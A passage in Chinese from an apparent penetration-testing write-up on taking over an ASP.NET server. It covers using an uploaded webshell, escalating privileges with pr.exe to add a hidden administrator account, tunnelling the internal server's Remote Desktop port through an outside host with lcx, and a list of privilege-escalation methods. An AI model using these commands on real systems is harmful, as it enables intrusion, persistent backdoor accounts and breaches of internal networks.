（3）获取Webshell
   在IE浏览器中打开上传Webshell的真实地址，如图12所示，输入Webshell的密
码后，出现熟悉的Asp.net Webshell界面。 8.尝试提权
通过Webshell查看该服务器安装程序和网站文件等，然后利用掌握的信息进行提权，
在本次渗透过程中发现该服务器为内网服务器，通过防火墙映射到外网，对外仅仅开放了
80端口，在网络地址中未配置DNS，系统中无可提权的其他可用信息。因此首先尝试使用

pr进行提权。如图13所示，先将pr程序上传到回收站中，然后分别执行
“E:\RECYCLER\pr.exe ” ， 参数“net user temp temp2005 /add” ，参数“net localgroup
administrator temp /add” 。执行结果显示“命令成功完成” ，表示pr提权成功。 9.登录远程桌面
（1）查看添加到用户
在Webshell中通过CMDShell查看刚才添加的用户是否成功，如图14所示，可以
看到系统已经添加了一个temp的管理员用户。 （2）使用lcx进行端口转发
    在具有独立IP的计算机上执行“lcx –listen 51 2008”，意思是监听51端口，
并将51端口映射到本机的2008端口。 在Webshell中执行 “E:\RECYCLER\lcx.exe” ，参数设置为 “-slave  202.XXX.XXX.XXX 51
172.30.11.81 3389” ，意思是连接IP地址202.XXX.XXX.XXX的51端口，将服务器内网地址
为172.30.11.81的3389端口转发到 202.XXX.XXX.XXX的51端口上。 （3）连接远程桌面
在监听51端口的计算机中打开远程终端登录界面，然后输入“127.0.0.1:2008”进行
登录，输入刚才添加到temp用户和密码，如图17所示，成功登录系统，从而获得服务器权
限，成功渗透该服务器。  1.对于Asp.net的渗透思路
（1）扫描目标网站，获取SQL注入点或者其它漏洞。扫描目标网站可以使用一些商业扫
描软件，例如wvs，appscan，webinspect，jsky，极光等。通过扫描获取网站程序漏洞和
配置漏洞。在扫描结果中有关单独的上传页面、上传组件（各种WebEditor） 、网站压缩文
件、bak备份文件的利用是重点。
（2）利用扫描结果信息进行渗透测试。
（3）获取Webshell。获取Webshell较多的方法是通过上传，以及各类Web编辑器的漏
洞，还有某一类程序的漏洞，当然这些漏洞的利用需要一些辅助条件。某些网站在被入侵后，
入侵者会将整个网站进行打包，下载完毕后未删除，如果能够成功将其下载，对于分析漏洞
和获取Webshell很有帮助。
（4）对服务器进行提权。对服务器提权主要是看服务器上安装有哪些程序，然后采取相
对应的提权方法，例如读取VNC密码，读取Radmin密码，下载Pcanywhere密码保存文件，
利用Serv-u直接添加用户，利用系统未安装补丁程序进行本地提权，编写autorun.inf病
毒，导出脚本到启动添加用户，MSSQL SA权限直接添加系统用户，Mysql udf函数提权等。 
2.在拥有Webshell情况下，利用LCX端口转发实现内网突破效果还是不错的。
3.在使用SQL注入工具扫描不出后台的情况下，可以尝试通过Google搜索来获取后台真实
地址。